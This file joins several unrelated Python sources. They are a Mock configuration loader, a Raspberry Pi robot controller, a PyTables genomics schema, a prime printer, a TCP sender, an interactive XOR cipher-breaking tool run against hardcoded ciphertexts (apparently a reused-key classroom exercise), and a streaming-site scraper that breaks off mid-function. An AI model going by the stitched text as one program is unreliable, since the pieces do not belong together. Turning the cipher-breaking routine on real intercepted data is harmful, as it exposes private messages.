'git_get': 'git clone SCM_BRN git://localhost/SCM_PKG.git SCM_PKG',
'svn_get': 'svn co file:///srv/svn/SCM_PKG/SCM_BRN SCM_PKG',
'distgit_get': 'rpkg clone -a --branch SCM_BRN SCM_PKG SCM_PKG',
'distgit_src_get': 'rpkg sources',
'spec': 'SCM_PKG.spec',
'ext_src_dir': os.devnull,
'write_tar': False,
'git_timestamps': False,
'exclude_vcs': True,
}
# dependent on guest OS
config_opts['useradd'] = \
'/usr/sbin/useradd -o -m -u %(uid)s -g %(gid)s -d %(home)s -n %(user)s'
config_opts['use_host_resolv'] = True
config_opts['chroot_setup_cmd'] = ('groupinstall', 'buildsys-build')
config_opts['target_arch'] = 'i386'
config_opts['releasever'] = None
config_opts['rpmbuild_arch'] = None # <-- None means set automatically from target_arch
config_opts['yum.conf'] = ''
config_opts['yum_builddep_opts'] = []
config_opts['yum_common_opts'] = []
config_opts['update_before_build'] = True
config_opts['priorities.conf'] = '\n[main]\nenabled=0'
config_opts['rhnplugin.conf'] = '\n[main]\nenabled=0'
config_opts['subscription-manager.conf'] = ''
config_opts['more_buildreqs'] = {}
config_opts['nosync'] = False
config_opts['nosync_force'] = False
config_opts['files'] = {}
config_opts['macros'] = {
'%_topdir': '%s/build' % config_opts['chroothome'],
'%_rpmfilename': '%%{NAME}-%%{VERSION}-%%{RELEASE}.%%{ARCH}.rpm',
}
config_opts['hostname'] = None
# security config
config_opts['no_root_shells'] = False
config_opts['extra_chroot_dirs'] = []
config_opts['package_manager'] = 'yum'
# configurable commands executables
config_opts['yum_command'] = '/usr/bin/yum'
if os.path.isfile('/usr/bin/yum-deprecated'):
config_opts['yum_command'] = '/usr/bin/yum-deprecated'
config_opts['yum_builddep_command'] = '/usr/bin/yum-builddep'
config_opts['dnf_command'] = '/usr/bin/dnf'
config_opts['rpm_command'] = '/bin/rpm'
config_opts['rpmbuild_command'] = '/usr/bin/rpmbuild'
return config_opts
@traceLog()
def set_config_opts_per_cmdline(config_opts, options, args):
"takes processed cmdline args and sets config options."
config_opts['verbose'] = options.verbose
config_opts['print_main_output'] = config_opts['verbose'] > 0 and sys.stderr.isatty()
# do some other options and stuff
if options.arch:
config_opts['target_arch'] = options.arch
if options.rpmbuild_arch:
config_opts['rpmbuild_arch'] = options.rpmbuild_arch
elif config_opts['rpmbuild_arch'] is None:
config_opts['rpmbuild_arch'] = config_opts['target_arch']
if not options.clean:
config_opts['clean'] = options.clean
if not options.check:
config_opts['check'] = options.check
if options.post_install:
config_opts['post_install'] = options.post_install
for option in options.rpmwith:
options.rpmmacros.append("_with_%s --with-%s" %
(option.replace("-", "_"), option))
for option in options.rpmwithout:
options.rpmmacros.append("_without_%s --without-%s" %
(option.replace("-", "_"), option))
for macro in options.rpmmacros:
try:
macro = macro.strip()
k, v = macro.split(" ", 1)
if not k.startswith('%'):
k = '%%%s' % k
config_opts['macros'].update({k: v})
except:
raise exception.BadCmdline(
"Bad option for '--define' (%s). Use --define 'macro expr'"
% macro)
if options.macrofile:
config_opts['macrofile'] = os.path.expanduser(options.macrofile)
if not os.path.isfile(config_opts['macrofile']):
raise exception.BadCmdline(
"Input rpm macros file does not exist: %s"
% options.macrofile)
if options.resultdir:
config_opts['resultdir'] = os.path.expanduser(options.resultdir)
if options.rootdir:
config_opts['rootdir'] = os.path.expanduser(options.rootdir)
if options.uniqueext:
config_opts['unique-ext'] = options.uniqueext
if options.rpmbuild_timeout is not None:
config_opts['rpmbuild_timeout'] = options.rpmbuild_timeout
for i in options.disabled_plugins:
if i not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--disable-plugin=%s'. Expecting one of: %s"
% (i, config_opts['plugins']))
config_opts['plugin_conf']['%s_enable' % i] = False
for i in options.enabled_plugins:
if i not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--enable-plugin=%s'. Expecting one of: %s"
% (i, config_opts['plugins']))
config_opts['plugin_conf']['%s_enable' % i] = True
for option in options.plugin_opts:
try:
p, kv = option.split(":", 1)
k, v = kv.split("=", 1)
except:
raise exception.BadCmdline(
"Bad option for '--plugin-option' (%s). Use --plugin-option 'plugin:key=value'"
% option)
if p not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--plugin-option' (%s). No such plugin: %s"
% (option, p))
try:
v = literal_eval(v)
except:
pass
config_opts['plugin_conf'][p + "_opts"].update({k: v})
global USE_NSPAWN
USE_NSPAWN = config_opts['use_nspawn']
if options.old_chroot:
USE_NSPAWN = False
if options.new_chroot:
USE_NSPAWN = True
if options.mode in ("rebuild",) and len(args) > 1 and not options.resultdir:
raise exception.BadCmdline(
"Must specify --resultdir when building multiple RPMS.")
if options.cleanup_after is False:
config_opts['cleanup_on_success'] = False
config_opts['cleanup_on_failure'] = False
if options.cleanup_after is True:
config_opts['cleanup_on_success'] = True
config_opts['cleanup_on_failure'] = True
check_config(config_opts)
# can't cleanup unless resultdir is separate from the root dir
rootdir = os.path.join(config_opts['basedir'], config_opts['root'])
if is_in_dir(config_opts['resultdir'] % config_opts, rootdir):
config_opts['cleanup_on_success'] = False
config_opts['cleanup_on_failure'] = False
config_opts['cache_alterations'] = options.cache_alterations
config_opts['online'] = options.online
if options.pkg_manager:
config_opts['package_manager'] = options.pkg_manager
if options.mode == 'yum-cmd':
config_opts['package_manager'] = 'yum'
if options.mode == 'dnf-cmd':
config_opts['package_manager'] = 'dnf'
if options.short_circuit:
config_opts['short_circuit'] = options.short_circuit
config_opts['clean'] = False
if options.rpmbuild_opts:
config_opts['rpmbuild_opts'] = options.rpmbuild_opts
config_opts['enable_disable_repos'] = options.enable_disable_repos
if options.scm:
try:
# pylint: disable=unused-variable
from . import scm
except ImportError as e:
raise exception.BadCmdline(
"Mock SCM module not installed: %s" % e)
config_opts['scm'] = options.scm
for option in options.scm_opts:
try:
k, v = option.split("=", 1)
config_opts['scm_opts'].update({k: v})
except:
raise exception.BadCmdline(
"Bad option for '--scm-option' (%s). Use --scm-option 'key=value'"
% option)
def check_config(config_opts):
if 'root' not in config_opts:
raise exception.ConfigError("Error in configuration "
"- option config_opts['root'] must be present in your config.")
@traceLog()
def include(config_file, config_opts, is_statement=False):
if os.path.exists(config_file):
if is_statement and config_file in config_opts['config_paths']:
getLog().warning("Multiple inclusion of %s, skipping" % config_file)
return
config_opts['config_paths'].append(config_file)
with open(config_file) as f:
content = f.read()
content = re.sub(r'include\((.*)\)', r'include(\g<1>, config_opts, True)', content)
code = compile(content, config_file, 'exec')
exec(code)
else:
raise exception.ConfigError("Could not find included config file: %s" % config_file)
@traceLog()
def update_config_from_file(config_opts, config_file, uid_manager):
config_file = os.path.realpath(config_file)
r_pipe, w_pipe = os.pipe()
if os.fork() == 0:
try:
os.close(r_pipe)
if uid_manager and not all(getresuid()):
uid_manager.dropPrivsForever()
include(config_file, config_opts)
with os.fdopen(w_pipe, 'wb') as writer:
pickle.dump(config_opts, writer)
except:
import traceback
etype, evalue, raw_tb = sys.exc_info()
tb = traceback.extract_tb(raw_tb)
tb = [entry for entry in tb if entry[0] == config_file]
print('\n'.join(traceback.format_list(tb)), file=sys.stderr)
print('\n'.join(traceback.format_exception_only(etype, evalue)),
file=sys.stderr)
sys.exit(1)
sys.exit(0)
else:
os.close(w_pipe)
with os.fdopen(r_pipe, 'rb') as reader:
while True:
try:
new_config = reader.read()
break
except OSError as e:
if e.errno != errno.EINTR:
raise
_, ret = os.wait()
if ret != 0:
raise exception.ConfigError('Error in configuration')
if new_config:
config_opts.update(pickle.loads(new_config))
@traceLog()
def do_update_config(log, config_opts, cfg, uidManager, name, skipError=True):
if os.path.exists(cfg):
config_opts['config_paths'].append(cfg)
update_config_from_file(config_opts, cfg, uidManager)
check_macro_definition(config_opts)
elif not skipError:
log.error("Could not find required config file: %s", cfg)
if name == "default":
log.error(" Did you forget to specify the chroot to use with '-r'?")
if "/" in cfg:
log.error(" If you're trying to specify a path, include the .cfg extension, e.g. -r ./target.cfg")
sys.exit(1)
@traceLog()
def load_config(config_path, name, uidManager, version, pkg_python_dir):
log = logging.getLogger()
if uidManager:
gid = uidManager.unprivUid
else:
gid = os.getuid()
config_opts = setup_default_config_opts(gid, version, pkg_python_dir)
# array to save config paths
config_opts['config_paths'] = []
config_opts['chroot_name'] = name
# Read in the config files: default, and then user specified
if name.endswith('.cfg'):
# If the .cfg is explicitly specified we take the root arg to
# specify a path, rather than looking it up in the configdir.
chroot_cfg_path = name
config_opts['chroot_name'] = os.path.splitext(os.path.basename(name))[0]
else:
chroot_cfg_path = '%s/%s.cfg' % (config_path, name)
config_opts['config_file'] = chroot_cfg_path
cfg = os.path.join(config_path, 'site-defaults.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
do_update_config(log, config_opts, chroot_cfg_path, uidManager, name, skipError=False)
# Read user specific config file
cfg = os.path.join(os.path.expanduser(
'~' + pwd.getpwuid(os.getuid())[0]), '.mock/user.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
cfg = os.path.join(os.path.expanduser(
'~' + pwd.getpwuid(os.getuid())[0]), '.config/mock.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
# default /etc/hosts contents
if not config_opts['use_host_resolv'] and 'etc/hosts' not in config_opts['files']:
config_opts['files']['etc/hosts'] = dedent('''\
127.0.0.1 localhost localhost.localdomain
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
''')
if config_opts['use_container_host_hostname'] and '%_buildhost' not in config_opts['macros']:
config_opts['macros']['%_buildhost'] = socket.getfqdn()
return config_opts
@traceLog()
def check_macro_definition(config_opts):
for k, v in config_opts['macros'].items():
if not k or (not v and (v is not None)) or len(k.split()) != 1:
raise exception.BadCmdline(
"Bad macros 'config_opts['macros']['%s'] = ['%s']'" % (k, v))
if not k.startswith('%'):
del config_opts['macros'][k]
k = '%{0}'.format(k)
config_opts['macros'].update({k: v})
@traceLog()
def pretty_getcwd():
try:
return os.getcwd()
except OSError:
if ORIGINAL_CWD is not None:
return ORIGINAL_CWD
else:
return find_non_nfs_dir()
ORIGINAL_CWD = None
ORIGINAL_CWD = pretty_getcwd()
@traceLog()
def find_btrfs_in_chroot(mockdir, chroot_path):
"""
Find a btrfs subvolume inside the chroot.
Example btrfs output:
ID 258 gen 32689 top level 5 path root
ID 493 gen 32682 top level 258 path var/lib/mock/fedora-rawhide-x86_64/root/var/lib/machines
The subvolume's path will always be the 9th field of the output and
will not contain a leading '/'. The output will also contain additional
newline at the end, which should not be parsed.
"""
try:
output = do(["btrfs", "subv", "list", mockdir], returnOutput=1, printOutput=False)
except OSError as e:
# btrfs utility does not exist, nothing we can do about it
if e.errno == errno.ENOENT:
return None
raise e
except Exception as e:
# it is not btrfs volume
log = getLog()
log.debug("Please ignore the error above above about btrfs.")
return None
for l in output[:-1].splitlines():
subv = l.split()[8]
if subv.startswith(chroot_path[1:]):
return subv
|
import RPi.GPIO as GPIO
import time
import sys, tty, termios
print '\nHi, I am PiBot, your very own learning robot.'
print 'My controls are "w"=forward; "s"=reverse; "a"=left; "d"=right and "q"=quit.'
print 'I hope you have lots of fun...'
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(13, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
RUNNING = True
try:
while RUNNING:
# Keyboard character retrieval method is called and saved
# into variable
char = getch()
if(char == "q"):
RUNNING = False
#print "\nPiBot is going offline."
break
# The car will drive forward when the "w" key is pressed
if(char == "w"):
print 'forward'
GPIO.output(11, True)
GPIO.output(13, True)
time.sleep(1)
GPIO.output(11, False)
GPIO.output(13, False)
# The car will reverse when the "s" key is pressed
if(char == "s"):
print 'back'
GPIO.output(7, True)
GPIO.output(15, True)
time.sleep(1)
GPIO.output(7, False)
GPIO.output(15, False)
# The car will drive left when the "a" key is pressed
if(char == "a"):
print 'left'
GPIO.output(13, True)
time.sleep(1)
GPIO.output(13, False)
# The car will drive right when the "d" key is pressed
if(char == "d"):
print 'right'
GPIO.output(11, True)
time.sleep(1)
GPIO.output(11, False)
# The keyboard character variable will be set to blank, ready
# to save the next key that is pressed
char = ""
except KeyboardInterrupt:
RUNNING = False
print "\nQuitting robot"
finally:
# Stop and cleanup to finish cleanly so the pins
# are available to be used again
GPIO.cleanup()
print "\nPiBot is going offline..."
|
from tables import *
Node.__getitem__ = lambda self, key : self._f_get_child(key)
def encodeChrName(name):
if name[0:3].lower() == "chr":
name = name[3:]
if name.isdigit():
enc = int(name)
assert enc < 1000000 # not to interfere with contig encodings
return enc
elif name.startswith('C') and name[1:].isdigit():
# contig e.g. C99999
return int(name[1:]) + 1000000
else:
enc = sum(ord(c) * 256**x for c, x in zip(name, range(len(name))))
assert enc < 2**32, (name, enc) # needs to fit in a 32 bit signed long
return -enc # return neg value
def decodeChrName(number):
if number < 0:
x = -number
decoded = ''
while x:
decoded += chr(x % 256)
x /= 256
return 'chr{}'.format(decoded)
elif number > 1000000:
# contig
return 'C{}'.format(number - 1000000)
else:
# chromosome
return 'chr{}'.format(number)
class MainChunkMap(IsDescription): # maps.main
colId = Int64Col(pos=1) # key
alignmentNumber = Int32Col(pos=2) # alignment nr (encoded chr nr)
chunk = UInt32Col(pos=3) # chunk nr
segment = UInt32Col(pos=4) # maf nr nr in chunk (for tracking chunkinization procedure)
score = Float64Col(pos=5) # maf alignment score
begin = Int64Col(pos=6) # alignment coord
end = Int64Col(pos=7) # alignment coord
class SpeciesChunkMap(IsDescription): # maps.<speciesname>
colId = Int64Col(pos=1) # key
chromosome = Int32Col(pos=2) # species chromosome
strand = Int8Col(pos=3) # ect..
begin = Int64Col(pos=4)
end = Int64Col(pos=5)
srcLength = Int64Col(pos=6)
class SpeciesCoordinates(IsDescription): # coords.<speciesname> (single pos coordinates, mapping between alignment and species coordinates)
chromosome = Int32Col(pos=1)
strand = Int8Col(pos=2)
SpeciesPositionOnPlusStrand = Int64Col(pos=3)
alignmentNumber = Int32Col(pos=4)
alignmentPosition = Int64Col(pos=5)
class SpeciesIntervalCoordinates(IsDescription): # coords.<speciesname> same as above but for intervals
chromosome = Int32Col(pos=1)
strand = Int8Col(pos=2)
alignmentNumber = Int32Col(pos=3)
SpeciesPositionOnPlusStrandBegin = Int64Col(pos=4)
SpeciesPositionOnPlusStrandEnd = Int64Col(pos=5)
alignmentPositionBegin = Int64Col(pos=6)
alignmentPositionEnd = Int64Col(pos=7)
class Posteriors(IsDescription): # posteriors.<speciesname>
V0 = Float64Col(pos=1) # state 0
V1 = Float64Col(pos=2) # etc...
V2 = Float64Col(pos=3)
V3 = Float64Col(pos=4)
maxstate = UInt16Col(pos=5) # state max prob
maxP = Float64Col(pos=6) # map prob
chunk = UInt32Col(pos=7) # chunk this originates from
alignmentPosition = Int64Col(pos=8) # (alignment pos)
alignmentNumber = Int32Col(pos=9) # alignment nr
speciesPosition = Int64Col(pos=10) # mapped species position
class Lists(IsDescription):
listNumber = UInt32Col(pos=1)
listIndex = UInt32Col(pos=2)
alignmentNumber = Int32Col(pos=3)
chunk = UInt32Col(pos=4)
alignmentPositionBegin = Int64Col(pos=5)
alignmentPositionEnd = Int64Col(pos=6)
class Segments(IsDescription):
AlignmentPositionFrom = Int64Col(pos=1)
AlignmentPositionTo = Int64Col(pos=2)
SpeciesPositionFrom = Int64Col(pos=3)
SpeciesPositionTo = Int64Col(pos=4)
State = Int8Col(pos=5)
|
__author__ = 'maln'
def isprime(n):
if n == 1:
return False
for x in range(2, n):
if n % x == 0:
return False
else:
return True
i = 1;
count_of_prime = 0
while count_of_prime < 10000:
if isprime(i):
print i
count_of_prime += 1
i += 1
|
import socket
import sys
import getopt
import marshal
import random
from time import sleep
sourceAddr = "0.0.0.0"
sourcePort = random.randint(60000, 65400) # Select random source port
packetLength = 32 # Number of bytes
packetBody = "\x00" * packetLength
socketFlagNum = 100 # SO_CROSS_LAYER_DELAY
sleepDuration = 2 # Seconds
def main(argv):
destAddr = -1
destPort = -1
numPacketsToSend = 0
delayToleranceInMs = 0
# Parse argument list
try:
opts, args = getopt.getopt(argv[1:], "ha:p:n:d:", ["addr=", "port=", "npack=", "delay="])
except getopt.GetoptError:
print(argv[0] + ' -a <dest_addr> -p <dest_port> -n <num_packets> -d <delay_tolerance_ms>')
sys.exit(2)
# Read arguments
for opt, arg in opts:
if opt == '-h':
print(argv[0] + '-a <dest_addr> -p <dest_port>')
sys.exit()
elif opt in ("-a", "--addr"):
destAddr = str(arg)
elif opt in ("-p", "--port"):
destPort = int(arg)
elif opt in ("-n", "--npack"):
numPacketsToSend = int(arg)
elif opt in ("-d", "--delay"):
delayToleranceInMs = int(arg)
if destAddr == -1 or destPort == -1:
print("Usage: " + argv[0] + '-a <dest_addr> -p <dest_port>')
sys.exit(1)
# Start transfer
transfer(destAddr, destPort, numPacketsToSend, delayToleranceInMs)
def transfer(destAddr, destPort, numPacketsToSend, delayToleranceInMs):
yes = 1
# Create socket and connect
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, yes)
fd.bind((sourceAddr, sourcePort)) # select source port to reduce nondeterminism
if delayToleranceInMs != 0:
print("Delay set to " + str(delayToleranceInMs) + " ms.")
fd.setsockopt(socket.SOL_SOCKET, socketFlagNum, delayToleranceInMs)
fd.connect((destAddr, destPort))
print("Transfer will begin in " + str(sleepDuration) + " seconds")
# Sleep for 'sleepDuration' seconds before starting
# sleep(sleepDuration)
# keep sending
while True:
# send a marshaled "size" header field
fd.send(marshal.dumps(packetLength * numPacketsToSend))
# Start the transfer
for x in range(int(numPacketsToSend)):
fd.send(packetBody.encode())
# exactly the size of ack msg
data = fd.recv(3)
print("Transfer complete, sent " + str(numPacketsToSend) + " packets.")
fd.close()
if __name__ == "__main__":
main(sys.argv)
|
import sys
import operator
import os
import string
class XorAttack(object):
def __init__(self):
self.exit = False
self.column = 0
self.maxCols = 0
def load(self):
self.messages = [
"315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e",
"234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f",
"32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb",
"32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa",
"3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce",
"315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3",
"271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027",
"466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83",
"32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904"
]
self.maxCols = 0
self.keys=[]
for msg in self.messages:
if len(msg) > self.maxCols:
self.maxCols = len(msg)
for i in range(0,self.maxCols -1):
self.keys.append('00')
def accept(self):
command = raw_input('?: ')
try:
if command == 'q':
self.exit = True
elif command[0:4] == 'col ':
self.column = int(command[4:])
elif command[0:4] == 'set ':
self.keys[self.column] = command[4:]
elif command[0:4] == 'keys':
self.showKeys(command[5:])
elif command[0:1] == 's':
self.showColumn()
elif command[0:5] == 'range':
self.showRange(command[6:])
elif command[0:4] == 'auto':
self.autoDiscover()
elif command[0:8] == 'discover':
self.discover()
elif command[0:4] == 'test':
self.test()
elif command[0:4] == 'get ':
self.getFrom(command[4:5],command[6:8])
else:
print
print "Unknown command"
print " q -> quit"
print " col # -> select column"
print " set # -> use key"
print " s -> show current column"
print " keys [#] -> show keys"
print " range [#] -> show range"
print " auto -> autodiscover"
print
except:
self.showKeys(100)
def getFrom(self, asciiClear, hexCipher):
print self.strxor(asciiClear,hexCipher.decode('hex')).encode('hex')
def test(self):
for i in range(0,255):
if chr(i) in string.printable:
print format("i: %d c: %s" % (i,chr(i)))
def isPrintable(self,c):
return c in string.printable and ord(c) >= 32
def isStrictPrintable(self,c):
return c == ' ' or c in string.digits or c in string.letters
def autoDiscover(self,cols=0):
cols = self.fixCols(cols)
#self.showRuler(cols)
for idx in range(0,self.maxCols -1):
sys.stdout.write("Discovering %d ..." % idx)
self.column = idx #setter
letters = self.discoverLetters()
if len(letters) == 1:
self.keys[idx]=letters[0].encode('hex')
print self.keys[idx]
continue
letters = self.discoverStrictPrintable()
if len(letters) != 0:
self.keys[idx]=letters[0].encode('hex')
print "fallback " + self.keys[idx]
continue
continue
def discoverPrintable(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2:(self.column *2)+ 2].decode('hex') )
if not self.isPrintable(clearAscii):
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discoverStrictPrintable(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2 :( self.column * 2)+ 2].decode('hex') )
if not self.isStrictPrintable(clearAscii):
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discoverLetters(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2 :( self.column * 2)+ 2].decode('hex') )
if clearAscii != ' ' and clearAscii not in string.letters:
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discover(self):
sys.stdout.write('printable: ')
for asciiKey in self.discoverPrintable():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
sys.stdout.write('strict : ')
for asciiKey in self.discoverStrictPrintable():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
sys.stdout.write('letters : ')
for asciiKey in self.discoverLetters():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
def strxor(self, a, b): # xor two strings of different lengths
if len(a) > len(b):
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a[:len(b)], b)])
else:
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b[:len(a)])])
def clean(self, ascii):
if self.isPrintable(ascii):
return ascii
return '~'
def showColumn(self):
print self.column
keyHex = self.keys[self.column]
keyAscii = keyHex.decode('hex')
for message in self.messages:
cipherHex = message[self.column * 2 :(self.column * 2) + 2]
cipherAscii = cipherHex.decode('hex')
clearAscii = self.strxor(cipherAscii,keyAscii)
cipherAscii = self.clean(cipherAscii)
clearHex = clearAscii.encode('hex')
clearAscii = self.clean(clearAscii)
print format("cipher %s (%s) -> %s -> %s (%s)" %(cipherHex,cipherAscii,keyHex, clearHex, clearAscii))
def fixCols(self,cols):
if cols == 0 or cols == '':
cols = self.maxCols
return int(cols)
def showRuler(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,1 + (cols-1)/10):
sys.stdout.write(format("%3d " % (i*10)))
print
for i in range(0,1 + cols-1):
sys.stdout.write(format("%d" % (i%10)))
print
def showHexRuler(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,1 + (cols-1)/10):
sys.stdout.write(format("%3d " % (i*10)))
print
for i in range(0,1 + cols-1):
sys.stdout.write(format("%d " % (i%10)))
print
def showKeys(self,cols=0):
cols = self.fixCols(cols)
self.showHexRuler(cols)
for i in range(0,cols-1):
print format("col %d" % i)
print format("set %s" % self.keys[i] )
def showKnownKeys(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,cols-1):
if self.keys[i] == '00':
sys.stdout.write('.')
else:
sys.stdout.write(' ')
print
def showRange(self, cols=0):
cols = self.fixCols(cols)
self.showRuler(cols)
self.showKnownKeys(cols)
for message in self.messages:
if cols > len(message):
thisCols = len(message)
else:
thisCols = cols
for idx in range(0,thisCols -1):
cipherHex = message[idx*2:(idx*2)+2]
cipherAscii = cipherHex.decode('hex')
clearAscii = self.strxor(cipherAscii,self.keys[idx].decode('hex'))
if (clearAscii < ' ' or clearAscii > 'z'):
clearAscii = '~'
sys.stdout.write(clearAscii)
print
self.showKnownKeys(cols)
self.showRuler(cols)
def main():
attacker=XorAttack()
attacker.load()
while not attacker.exit:
attacker.accept()
if __name__ == '__main__':
main()
|
import re, urllib, urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
class source:
def __init__(self):
self.priority = 1
self.language = ['fr']
self.domains = ['www.cinemay.com']
self.base_link = 'http://www.cinemay.com'
self.key_link = '?'
self.search_link = 's=%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'localtitle': localtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'localtvshowtitle': localtvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
print '------------------------------- -------------------------------'
sources = []
print url
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
print data
title = data['title']
year = data['year'] if 'year' in data else data['year']
season = data['season'] if 'season' in data else False
episode = data['episode'] if 'episode' in data else False
localtitle = data['localtitle'] if 'localtitle' in data else False
if season and episode:
localtitle = data['localtvshowtitle'] if 'localtvshowtitle' in data else False
t = cleantitle.get(title)
tq = cleantitle.query(localtitle)
tq2 = re.sub(' ', '', cleantitle.query(localtitle).lower())
tq = re.sub(' ', '%20', tq)
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
query = 'http://www.cinemay.com'
r = client.request('http://www.cinemay.com/?s=%s' % tq)
print 'http://www.cinemay.com/?s=%s' % tq
r = client.parseDOM(r, 'div', attrs={'class': 'unfilm'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], re.sub('(film| en streaming vf| en streaming vostfr|’| )', '', i[1][0]).lower()) for i in r if len(i[0]) > 0 and len(i[1]) > 0]
r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:saison|s)\s+(\d+)', i[1])) for i in r]
